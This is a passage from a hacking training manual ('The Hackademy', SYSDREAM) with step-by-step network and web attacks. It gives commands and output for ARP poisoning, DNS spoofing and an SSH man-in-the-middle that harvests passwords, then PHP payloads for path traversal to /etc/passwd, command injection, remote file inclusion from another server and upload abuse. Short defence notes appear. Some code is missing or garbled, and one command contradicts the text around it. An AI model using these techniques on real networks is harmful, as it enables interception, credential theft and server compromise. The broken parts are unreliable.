The ARP protocol has never been conceived for security and this will allow us to hijack the existing connections between two machines of the same LAN. Two security problems can appear: •
This protocol does not keep the states, meaning that a machine receiving an ARP response will accept it and update its cache, even if it has not sent a previous ARP request.
•
A machine receiving an ARP request automatically updates its cache to re-associate the IP and the MAC of the sender.
It is therefore possible to forge ARP requests or responses to or from a machine in order to corrupt its cache by associating a network IP to the MAC of a hacker's machine. So when a machine B sends a packet to A's IP, it will be encapsulated in an Ethernet packet whose physical destination will be that of the hacker. By proceeding in this manner, it can also hijack the flow from B to A. This type of operation can be done manually on Linux: First of all, we must deactivate the routing on machine C: echo 1 > /proc/sys/net/ipv4/ip_forward
We are then going to to send two ARP responses, one towards A and the other one towards B: The prerequisite data is:
Machine
IP
MAC
A
192.168.124.1
00:09:5B:44:AA:E4
B
192.168.124.20
00:50:22:80:B3:34
C
192.168.124.12
00:90:4B:77:CC:D1
We are going to forge packets with the help of the ARPSpoof tool (on both Linux and Windows): The options to pass are: -i : Interface -t : Optional, if all you want is to hijack the connection between a particular target and a host. host: host towards which all connections must be hijacked. If the -t option is not used, then all the connections of all the network's machines to this host will be hijacked: Laptop:/home/xdream# arpspoof 192.168.124.1 0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1 0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1 0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1 0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1 0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1 0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1 0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1 0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1 0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1 The Hackademy
DMP
-90/209-
SYSDREAM
Let us now display the contents of machine B's ARP cache: Dantes:~# arp -a arp -a ? (192.168.124.1) at 00:90:4B:77:CC:D1 [ether] on eth0 ? (192.168.124.12) at 00:90:4B:77:CC:D1 [ether] on eth0 ? (192.168.124.15) at 00:50:BA:5D:35:6C [ether] on eth0 ? (192.168.124.10) at 00:50:8D:F9:E2:5E [ether] on eth0
We can see that machine A's address is associated to the hacker machine's MAC address. If we trace the path taken by a packet from machine B to machine A, we notice that it also passes through machine C: Dantes:~# traceroute 192.168.124.1 traceroute 192.168.124.1 traceroute to 192.168.124.1 (192.168.124.1), 30 hops max, 38 byte packets 1 192.168.124.12 (192.168.124.12) 1.093 ms 36.272 ms 1.863 ms 2 192.168.124.1 (192.168.124.1) 3.006 ms 2.242 ms 2.730 ms
Another tool on both Linux and Windows can manage the whole hijacking in a more automatic way: ettercap. The version used will be the 0.6.0 one, which you will find at: http://prdownloads.sourceforge.net/ettercap/ettercap-0.6.b.tar.gz?download You can display a help panel with the h command. Select two IPs between which you want to hijack the traffic. You will then be able to sniff the connections.
The Hackademy
DMP
-91/209-
SYSDREAM
You can then hijack all traffic between these two machines (s command). All established connections can then be sniffed: select one, then press Enter.
Finally, it is possible to inject commands into an existing canal. Select the canal in question, you will have two windows, one for the client, the other one for the server. With the help of , choose the window where you wish to inject a command to be executed (it should be the server's) and start the injection window with the i key. Of course, the command you inject will be sent as such. This means that you must respect the associated protocol format. If it were for example an FTP protocol and you wanted to create a directory, the command to send would be MKD dir.
The Hackademy
DMP
-92/209-
SYSDREAM
B) DNS hijacking The DNS protocol is destined to resolve a host name, for example www.thehackademy.net into an IP address, in order to establish a direct communication with the server in question. The DNS protocol's format is as follows: The standard host name resolution procedure is the following one: 1) The client sends a DNS request to the name server in order to resolve the name www.serv.com into its IP address. 2) The DNS server quizzes the serv.com domain DNS in order to determine the IP of machine www. 3) The DNS server sends back the IP address associated to www.serv.com to the client through a DNS answer. The principle of DNS hijacking will therefore be to hijack a DNS response to replace the server IP to which the victim wishes to connect with the hacker's. He will then be able to freely emulate a site to recover information (access codes, ...) or simply forward the connection to the server so as to spy on the communication. We are going to use the Denver tool (on Linux) to redirect a connection request towards www.google.com to the www.thehackademy.net website in a way that is transparent for the user. The options to send are: -g : -h : -d : -p :
Gateway IP. IP of the host to be hijacked. Domain to be spoofed. IP to which the connection must be hijacked.
The Hackademy
DMP
-93/209-
SYSDREAM
Laptop:/# denver -s -i wlan0 -g 192.168.124.1 -h 192.168.124.12 -d www.google.com -p 213.30.164.104 Starting denver 1.0 --- [email protected] Error: the host and the local interface ip's are the same. Laptop:/# denver -s -i wlan0 -g 192.168.124.1 -h 192.168.124.10 -d www.google.com -p 213.30.164.104 Starting denver 1.0 --- [email protected] Checking if host and gateway are up and running on the LAN ... Success. 192.168.124.10 is beeing fooled. Waiting for DNS requests ... -------DNS request to 'www.google.com' spoofed successfully
Security As the ARP protocol is used to update tables, the best way to avoid this type of attack is to manually fill the ARP cache of each machine. For this, we will use the arp program, which will enable us to carry out this operation by associating each IP present on the network to its real physical address: arp -s x.x.x.x y-y-y-y-y-y
6. Attacking secure protocols A) SSH SSH can establish a secure communication in command shell mode. There are today two versions of the SSH protocol, ssh1 and ssh2. The whole communication as well as the login/password are exchanged in an encrypted manner on the network. The establishment of the secure communication follows the following process: 1) Connection request from the client. 2) Server sends banner. 3) Server sends public key. 4) A symmetric key generated by the client is encrypted with the public key provided by the server. 5) Symmetric key is sent to server 6) Communication is established. Hijacking an SSH session is comparable to hijacking an SSL one. The pirate places himself between the client and the server and emulates an SSH server to which the client will be re-directed in order to identify himself. In turn, the hacker establishes a communication with the final SSH server thanks to the login and password obtained from the client. If ssh1 is vulnerable to this type of attack, ssh2 is supposed to be protected from it. The Hackademy
DMP
-94/209-
SYSDREAM
ssh2 protection The server's public key is stored in the known_host on the client side. If during the connection the key sent back is not the one indicated in the file, which will necessarily be the case, the ssh client refuses to establish a communication, by sending back this type of message: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY! Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that the RSA1 host key has just been changed. The fingerprint for the RSA1 key sent by the remote host is f3:cd:d9:fa:c4:c8:b2:3b:68:c5:38:4e:d4:b1:42:4f. Please contact your system administrator.
However, it is the server who gives the client the ssh (1 or 2) protocol version which will be used through the presentation banner it sends back: SSH-1.99-OpenSSH_2.2.0p1 So it is possible to force the client to use another version of the protocol than the one he usually uses. The public key used in the ssh2 protocol is different from the one used with ssh1, even if it is the same server. As the key used in the version of protocol 1 is not the same as the one in the known_host file, the client will ask if he must add it. If the user answers yes, a secure communication will be established through the hacker's machine, and in a way that is transparent for the victim. On Linux, the ssharp tool associated to the mss tool can carry out this attack: You will find these two tools on thehackademy.net website. Let us first compile mss: tar xzvf mss-0.3.tgz cd mss make all make install
We can then compile ssharp: tar xzvf 7350ssharp.tgz cd ssharp ./configure make make install cp ssh /usr/local/bin/ssharpclient
Be careful, ssharp is a modified version sshd which is a real diamond, which will replace your previous version of openssh, if you have one. The Hackademy
DMP
-95/209-
SYSDREAM
Carrying out the attack First, have the modified sshd diamond listen to port 10000: ./sshd -4 -p 10000
We will then hijack the connections: Let us activate the routing: echo 1 > /proc/sys/net/ipv4/ip_forward
We then request that all connections directed to port 22 be rerouted to local port 10000: iptables -t nat -A PREROUTING -p tcp --sport 1000:65000 --dport 22 -j REDIRECT –to-port 10000 -i eth0
Finally we hijack the communications with a standard arp poisoning type attack for all communications with the target server: arpspoof -i eth0 192.168.124.20
When the client establishes a connection, he will receive a message of this type: Laptop:/home/xdream# ssh Dantes The authenticity of host 'dantes (192.168.124.20)' can't be established. RSA key fingerprint is d8:84:7a:96:36:15:2e:40:3e:7f:6e:e8:12:23:74:97. Are you sure you want to continue connecting (yes/no)? yes
If the client answers yes, he will be able to connect, and a temporary file will be created on the hacker's machine, of the ssharp-IPSERVER.PID type. You can then use the mss-client binary on this file to spy on the communication: mss-client /tmp/ssharp-192.168.124.20.11234 What's more, the captured logins and passwords are stored in the /tmp/ssharp file: Laptop:/home/xdream# cat /tmp/ssharp 192.168.124.20:22 [xdream:password]
Security The best protection against this type of attack is to use the ssh2 protocol with the client, even if the server requests the use of ssh1. You can at the same time give the -2 option to the client: ssh -2 192.168.124.20
The Hackademy
DMP
-96/209-
SYSDREAM
B) SSL The SSL protocol functions with the sending of a public key certificate, which will be used to encrypt the communication in a secure canal, following the same methodology as SSH. The attack is therefore in theory quite similar. The pirate will emulate on a relay machine, through which the victim passes, an SSL server, who de-encrypts and re-encrypts the communication to forward it to the final server. The Ettercap utility, that we have already studied, knows how to implement this type of attack without any particular option. Another method is to force the user to pass through a proxy server that also implements an SSL server (SSLProxy : http://www.obdev.at/products/ssl-proxy/). For conventional HTTP requests we will use Achilles on Windows. This utility is a proxy HTTP server, which can log the communications it transits, and which can modify the contents of requests or of answers destined to the client or the web server. Simply specify a port that will be listened to and activate the options: Intercept mode ON, Intercept Client Data, Intercept Server Data and ignore .jpg/.gif.
In the main window, you can modify the contents of the requests or of the web pages sent. Be careful when you forward the communication between the two parties in this mode, as you will have to validate each request or page with the Send button.
Security SSL certificates are known sites that are generally referenced in databases automatically consulted by web navigators, in order to check that the certificate sent back is an authentic one. When it is a fake one, a warning is sent back.
The Hackademy
DMP
-97/209-
SYSDREAM
Faced with this type of warning, you should not trust the server onto which you are connected, as you cannot be sure of the confidentiality of the communication.
7. Denial of Services Denial of service attacks are critical ones in terms of company security as their aim is to make resources of a computer system unavailable. On a small scale, a denial of services attack can make a server application unavailable. On a medium scale, it does that to a machine. On a large scale, it can paralyse the whole network. We generally identify four types of denials of services: • • • •
SYN flooding; exploitation of a bug; smurfing/DDoS; ARP cache poisoning.
SYN flooding consists in sending a great number of connection requests to a server without ever validating or cancelling these requests. This way, buffering before the 'timeout' of a connection, a number of pending requests that is too high can saturate the memory of a service and prevent any legitimate connection later on. The exploitation of a bug or of a vulnerability can result in the dysfunctioning of certain server applications or even the operating system and make them unstable. Smurfing consists in passing as a machine (the victim) and sending ping requests that broadcast these packets to subnetworks. The machines of these subnetworks then respond to the machine which has never sent any data. When an attacker sends one request, the victim will receive dozens of responses and be saturated. We should note that DDoS (Distributed Denial of Service) also consists in using several IT ressources against one single machine. It is a more generic term, and the attack is said to be « distributed ».
The Hackademy
DMP
-98/209-
SYSDREAM
Recent viruses use the resources of infected machines to flood websites such as Microsoft's or SCO's with requests. On a local network, it is also possible to use ARP cache poisoning to make all the machines of the network unavailable for a few seconds. Démonstration of a DoS : We will use a fabrication kit of ARP and ARP-SK requests. This tool will allow us to fake ARP requests and we will use an interface in Perl whose aim is to correctly use ARP-SK in order to carry out a DoS type of attack. ARP-SK is available on both Windows and Linux. We will use it from a machine on Linux, which changes nothing to the principle of the attack. ARP-SK is available at http://www.arp-sk.org. Perl exploit is available at http://www.sysdream.com. From the attacking side, this is what the attack looks like:
Once the tool launched, all the machines on the local network 192.168.1.x have updated their MAC addresses table for all the network's IPs, with the address specified by the attacker (here 12:34:56:78:9a:bc). No machine can then communicate with any other machine. The attack will have taken 10 seconds.
The Hackademy
DMP
-99/209-
SYSDREAM
CHAPTER IV WEB VULNERABILITIES
The Hackademy
DMP
-100/209-
SYSDREAM
1. Site Mapping The first thing a hacker will do during an attack on a Web service will be to summarize the banners (see chapter I: Information Acquisition) as well as map the site to recover a maximum of indications on his target. Mapping a website can be done in several ways. Either the hacker will have found a loophole allowing him to list the contents of all the directories of the server, or he will use appropriate software which will follow all page links from the index page of the website. This is not the end of the story, however. What will be of interest to the hacker will be the files and directories forgotten by the webmaster and not linked to a public page. Intellitamper is such a software that can recover the list of all files present on the server and to use brute force on the file or directory names to find their existence. Intellitamper functions on Windows, so we will also see the example of a PHP script attacking through a dictionary. Intellitamper
Intellitamper is a software with a very simple interface which will enable us to map the website without downloading the files (unlike Web aspirators). By default, it functions by following the links present on each page from the site index. To start the software, all that has to be done is to give it the url of the site that is to be scanned and to click on the small button in the shape of a magnifying glass. In the example above, “http://www.thehackademy.net” is our target. By launching options by default, Intellitamper will not use brute force to find all the directories (or files) not linked to the pages.
The Hackademy
DMP
-101/209-
SYSDREAM
In the options, one can ask Intellitamper to carry out a scan using brute force. The first thing to give to it is the dictionary to be used to find files or directories that are not linked (DictionaryClassic.txt)
Then, the option “Perform dictionary scan” must be selected in the “Files and folders” tab to activate brute force.
All that remains to be done is to click on “OK” to close the options window and relaunch Intellitamper.
The Hackademy
DMP
-102/209-
SYSDREAM
Scan_web.php Scan_web.php is a PHP script that can look for directories or files on a web server by using a dictionary file. Here is the source code of the script: "; for ($count = 0 ; $count < $repnb ; $count++) { if($ssl){ $fp = @fsockopen("ssl://".$host, $port, $errno, $errstr, $timeout); } else{ $fp = @fsockopen($host, $port, $errno, $errstr, $timeout); } if(!$fp){ die("Connection impossible !!"); } else { $header = "GET /".$ss_rep."".trim($rep[$count])." HTTP/1.0\n"; $header .= "Host: ".$host."\n"; $header .= "User-Agent: GoogleBot\n\n"; fputs($fp,"GET /".trim($rep[$count])." HTTP/1.0\n\n"); while(!feof($fp)){ $nom=fgets($fp,200); if (eregi("200 OK",$nom)){ print("Found : $rep[$count] "); break; } elseif(eregi("403 Forbidden",$name)){ print("Found (deny): $rep[$count] "); break; } elseif(eregi("401 Authorization Required",$name)){ print("Found (basic auth): $rep[$count] "); break; } else{ break; } } The Hackademy
DMP
-103/209-
SYSDREAM
fclose($fp); } } } else{ print "Scanner Web by CrashFr
"; print "
The dictionary file is called “dictionary.txt” and will have to be placed in the same directory as “scan_web.php”. It contains one directory or file name per line. To launch the script, all that has to be done is to specify the address as well as the HTTP server port to scan. In the example below, we carry out a local scan on port 80 with a default timeout of 10 seconds. Here is the result found:
Many webmasters leave temporary files unattended, thus allowing the hacker to obtain a certain amount of information on the remote server or to have access to the administrator panel. The file that is very often found on sites coded in PHP is a file using the phpinfo() function, which is used by the webmaster to check the proper functioning of PHP.
The Hackademy
DMP
-104/209-
SYSDREAM
The phpinfo() function gives the hacker very important information such as the version and type of OS, HTTP, PHP and many others we will not mention in this chapter. It is therefore strongly recommended to delete all temporary files, test files, etc., to avoid making the hacker's task any easier and especially to remember that a directory or a file that is not linked from a page of the site is a hidden or inaccessible one...
The Hackademy
DMP
-105/209-
SYSDREAM
2. PHP Vulnerabilities In some cases, the hacker can use vulnerable PHP scripts to execute commands, display the file sources, list the contents of directories or upload files on a server in order to finally take total control of or steal the contents of a database. There are several vulnerabilities at the PHP level; those coming from the PHP source code and those due to improper website development by the webmaster. For a start, here are several examples of vulnerabilities coming from the PHP source code which we will not attempt to detail in order not to lose time on details where a good knowledge of applicative vulnerabilities is needed: http://www.securityfocus.com/archive/1/368864 http://www.securityfocus.com/archive/1/368861 So in this second part, I will explain what the various vulnerabilities are that a hacker could use if the website developer has not created its code in a secure way. As PHP is a dynamic language, it is very common to come across websites with forms that enable us, for example, to subscribe to a mailing list or send personal information about ourselves. We will therefore create a very simple form in HTML with two fields (“login” and “pass”) that could be used on any site to identify a user. This HTML script will send 2 variables to the ident.php script with the post method, as soon as the user will click on the validate button.
The “ident.php” file contains the PHP code that will verify if you have typed in the proper login and password. Here is what the identification source code could look like (if register_globals=on in php.ini) :
DMP
-106/209-
SYSDREAM
back to an error message */ if ($ok == 1) print "You are identified"; else print "You are not identified"; ?>
In this first script it would be easy for the hacker to bypass the protection without knowing the correct password if he can guess the name of the “$ok” variable or if the script is in Opensource and he has access to the source code. PHP actually enables the user (visitor) to create and define variables directly from its navigator by using the GET method (via the url), POST (via a form) or COOKIE (by forging a cookie). When you click on the button “validate” of the form, your navigator sends the “login” and “pass” variables to the HTTP packet destined to the server by using the POST method. However this does not mean that the script does not interpret the variables sent with the GET method directly after the URL that follows the question mark. Let us take an example: I use crashfr as a login and test as a password and I click on the “submit” button of my form. It is exactly the same thing (if register_globals=on) as if I typed directly into my navigator: http://www.myserver/ident.php?login=crashfr&pass=test.
If ever the hacker forces the $ok variable from the URL by putting it at 1, he would be identified without knowing the password.
We can see that this type of vulnerability, like most PHP vulnerabilities, comes from bad coding because the webmaster should have initialized the “$ok” variable at 0. But we can also see that the variables used in PHP script can be forced directly from the URL is “register_globals” is activated. But to what exactly does “register_globals” correspond? Actually, the “register_globals” option can make the developer's task easier. The php differentiates the variables GET, POST, Cookie, Environment and the variables defined in the script stored in independent tables. For example, if we want to recover the”$var1” variable sent in POST, we would have to use the variable “$HTTP_POST_VARS['var1']” in the case where “register_globals” is off. In the opposite case (if register_globals=On), we can directly use the variable “$var1”. But what happens if we receive “$var1” in both POST and GET at the same time but with a different value? In fact, there is an option in php.ini which indicates in which order the variables are interpreted. This option is called “variables_order” and its value by default is “EGPCS”, The Hackademy
DMP
-107/209-
SYSDREAM
which means that the order by default is Env, GET, POST, Cookie, Built-in variables. So if ever someone sends at the same time “$var1=get” using the GET method and “$var1=post” using the POST method, the script displaying “$var1” will send back “get”. Fopen() Function The Fopen function is one that can open a file that is on the server. This function is for the case where the variable used to define which file to open can be forced by the user and is not filtered correctly by the script, becomes a very powerful information tool for the hacker.
This script (fop.php) opens a file for reading and displays the contents. By forcing the variable$file from the URL we can thus open some (normally) non-accessible files from the HTTP interface. http://myserver/fop.php?file=../../../../../etc/passwd // displays the passwd file http://myserver/fop.php?file=../../../../../etc/apache/httpd.conf // displays apache's configuration file . There is another function that enables you to read the contents of a file that a hacker could exploit in the same way as with a fopen(): the function “file()” which loads the whole contents of a file into a table. To avoid this kind of vulnerabilities, all that has to be done is to force the opening of a file in a specific directory and to check that the user is not trying to return to the root, as below:
The Hackademy
DMP
-108/209-
SYSDREAM
System() Function The System() function is one of the functions that can call the system commands. These commands will depend on the OS. For example, if the webmaster wants to allow the visitor to do a ping from a webpage, here is the script he could use on Unix: "; print "
Here is the result of a ping on a localhost, for example:
The problem with this type of script is that the user can use the escape shells to have other commands executed (see the Applicative chapter). Here is an example which would allow an “ls” command to display the contents of the directory /etc:
The Hackademy
DMP
-109/209-
SYSDREAM
Here are the other functions that can execute system commands: exec(), shell_exec(), popen(), proc_open(), passthru()
Security To avoid this type of vulnerability, there are several functions to escape the characters that can make escape shells such as “escapeshellcmd(). It is also possible to use regular expressions to filter what is sent by the user. Here is the line to modify to prevent the hacker from executing commands other than ping/ system(escapeshellcmd('ping -c 5 '.$host));
The Hackademy
DMP
-110/209-
SYSDREAM
Uploading via PHP Quite often, one can come across scripts that can upload files on a server via a PHP script. Here is an example of a form that could be found on the Net: "; exit; } ?> Upload file
This script, which I will call form2.php will send a local file directly to the server hosting it. The hacker can use this type of form to recover some sensitive files such as for example the passwd file or simply visualize the PHP file source which in general keeps some passwords like those of the database. It should be known that when a file is sent towards a PHP script, and the file size is both inferior to the one mentioned in the php config file (php.ini) and not equal to zero, then the file will be temporarily stored in a server directory. To check the type, size and name of the file, the server defines four variables. In our script, the name of the field type is called “file”, so the four variables (if register_globals=on) are: - $file --> name of the file temporarily stored on the server - $file_name --> real name of the local file - $file_type --> type of file - $file_size --> size of file By defining these four variables instead of having the server do it, we will be able to have it copy a file that should not be accessible to us. In our example, I am going to copy server .php file into a .txt file. This way, I will be able to visualize the file's source, which was originally interpreted by the server. Changing its extension will avoid it being interpreted.
The Hackademy
DMP
-111/209-
SYSDREAM
Here is the result that for example enables one to recover the connection login/password to the Mysql database:
Security To avoid this kind of attack, we can use the PHP function which will check that the file has been uploaded using the POST method, as this prevents files on your server from being copied. Here is the code using the function “move_uploaded_file()” enabling us to make our script is secure:
Include() Function There are several functions that have to be used carefully when coding in PHP. Let us start with the include() function, which is very often used by the hacker to have malicious code executed by the HTTP server. The include() function can include another file's PHP code into a main PHP script.
The Hackademy
DMP
-112/209-
SYSDREAM
inc.php file
page1.php file
include($page);
print "yopyop";
?>
?>
By typing http://myserver/inc.php?page=page1.php, our navigator displays yopyop. This is perfectly normal. The hacker is also going to define the variable $page in such a way that the server will execute its malicious php code. Let us imagine that the hacker has uploaded the malicious code on another server: All he has to do now is to type: http://myserver/inc.php?page=http://serveur2/codemal.php so that “myserver” can execute the malicious code present on server2. To avoid this kind of vulnerability, there are several PHP functions. The first one is “file_exists()”: this function can check if the file exists locally on the local server. In the example above, the hacker could not include an external file if the inc.php file were modified as below:
However, the hacker could bypass this protection by temporarily uploading a file on the server. Uploading towards a PHP is a very special procedure. If a file is sent through a form towards a PHP script, before the script is interpreted, a temporary saving of our file is done on the server. Even if the file is refused by the script, it is still uploaded in a temporary directory on the the server! (Generally /tmp). To illustrate this example, we are going to create an upload HTML script (.html form) locally, as below:
The Hackademy
DMP
-113/209-
SYSDREAM
The script below will associate our uploaded file to the variable “$page”. This is what our form looks like in local:
Now a malicious script has to be created (malicious.php) that we are going to upload thanks to the form. "; phpinfo(); ?>
All that has to be done now is to click on browse (form.html), choose the file to send (malicious.php) and watch the result:
The target server has executed our malicious code. This proves that the server has created a temporary file affected to the variable $page because the PHP function file_exists() has detected the file on the server. In the opposite case the inc.php script would not have included our malicious script... Security To avoid this kind of vulnerability, you should add a small verification at the level of the file which uses the include function as below:
We have also added a small verification to prevent the script from running over and over again if the hacker defines “$page=inc”. The Hackademy
DMP
-114/209-
SYSDREAM
There are other functions of the same type that can carry out includes, such as: include_once(), require(), require_once()
3. CGI Vulnerabilities CGI means Common Gateway Interface, and these interfaces are applicative ones, hosted on the web server, and whose function is to receive and process data sent by the client's navigator, and to send back the results in HTML format. In this way, and like PHP, CGIs are used to establish dynamic web pages on a web server. In a way, there are similarities with this language, but also major differences. First of all, they can be written using any language: C, perl, script, shell... The important thing is to understand that the information sent back by the navigator will be processed according to a standard and with the help of environment variables defined by the web server. We are going to explain this in detail: First, the information is sent to the server through pre-defined variables in the form, and understood by the CGI program. In this, the principle is exactly the same as for PHP, meaning that we use a form tag
DMP
-115/209-
SYSDREAM
REMOTE_HOST: Client's host name CONTENT_TYPE: Type of information transferred CONTENT_LENGHT: Number of bytes of data sent to the CGI by the client QUERY_STRING: Saves the data sent by the client if the transfer method is METHOD=GET. If it is METHOD=POST that is used, data will be read on the standard output. The difference with PHP lies above all in the way CGI processes the received data. PHP can recognize and directly use the name of variables defined in the form, something that the CGI program cannot do. The latter will have to recover everything that is after ? In the form of a character chain to process it, and so obtain the value of the variables that are sent to it through the form. CGI has to process arguments in this way because using a form always sends back data in the shape of variable1=value1&variable2=value2... It can therefore be concluded that it would be entirely possible to pass the arguments to the program in a different form, by specifying them in the url after the ?, and naturally only if the program were coded in such way that it could process this information. Here is an example of code that will recover the information sent back by the client through a form: char buffer[50]; buffer = getenv("REQUEST_METHOD");
// We recover the method used in the environment variable REQUEST_METHOD if (buffer) { // if this operation is successful we continue if (strcmp(buffer, "POST") == 0) { // If the POST method is used buffer = getenv("CONTENT_LENGHT"); // we recover the size of data sent back by the form if(buffer) { // If this operation is successful we continue length = atoi(buffer); // We put this value in digital form data = malloc(buffer + 1); // we attribute memory space for the data variable which will recover data fread(data, 1, length, stdin); data[length] = '\0';
// we copy what arrives on the standard output into buffer // we add the '\0' character at the end of the character chain contained in buffer
strcpy(data, getenv("QUERY_STRING")); // We copy the data contained in QUERY_STRING into buffer data[length] = '\0'; } }
Once the data sent back to the cgi program, it must be processed, in order to extract the variables' values: we know that these are separated with the & sign, and the following function could be in charge of recovering the value of the first variable in a temporary buffer.
The Hackademy
DMP
-116/209-
SYSDREAM
i=0; j=0; while (data[i] != '=') { variable_name[j++] = data[i++]; } variable_name[j] = '\0' // we fill in the variable variable_name which will contain the name of the variable as long as a “=” sign will not have i++; // been encountered. j = 0; while(data[i] != '&') { variable[j++] = data[i++]; } variable[j] = '\0';
We are also going to specify the exact syntax that a URL can have for the proper understanding of the rest of the chapter. A URL cannot have any space characters, nor can it have any line feed, or any characters with accents. Their ASCII equivalents have to be used. The two most important ones to know are %0a for line feed %20 for space Now that we have studied how CGIs function, we are going to present security problems linked to them. CGI is a program that is executed on the server, it is therefore possible to indicate to it variables that will have it execute commands that are not wanted by the administrator, or that will allow the consultation of files to which the user should not normally have access, such as the /etc/passwd file under a UNIX type system, as it contains the list of users. We are going to see several common vulnerabilities which can exist in a CGI program: • •
•
•
•
A common mistake is to use hidden type variables in the form: they are presented as follows: The main danger with this type of configuration is that it allows a hacker to know the name of the variables used by the CGI, which have pre-defined values. He could then try to modify them to his liking. Furthermore, if this variable is being used to indicate any configuration, log or result file (where the user data will be stored), it will be possible to have the exact path and so it will be possible to consult them It is also a regular occurrence that a hidden field contains an email address where all the information given by the client will be sent. In this case, the server will use the system() function to mail these results to the indicated address. This case is studied in the following paragraph. It is also possible for this variable to be used by the CGI as the address of a page confirming reception of data. If the script has been badly configurated, we can give another pass to visualize a file such as /etc/passwd.